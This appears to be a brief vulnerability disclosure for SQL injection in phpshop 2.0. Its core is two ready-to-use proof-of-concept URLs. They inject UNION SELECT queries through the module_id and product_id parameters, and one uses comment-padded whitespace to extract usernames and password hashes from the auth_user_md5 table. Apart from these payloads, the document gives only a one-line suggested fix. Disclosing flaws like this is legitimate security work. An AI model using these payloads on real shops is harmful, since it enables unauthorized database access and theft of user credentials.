Title: phpshop 2.0 SQL Injection Vulnerability
Author: onestree
Download: http://code.google.com/p/phpshop/downloads/list
Tested on: Windows 7 / Ubuntu

SQLi p0c:

==================

http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --

http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--

Fix:
Strengthen input filtering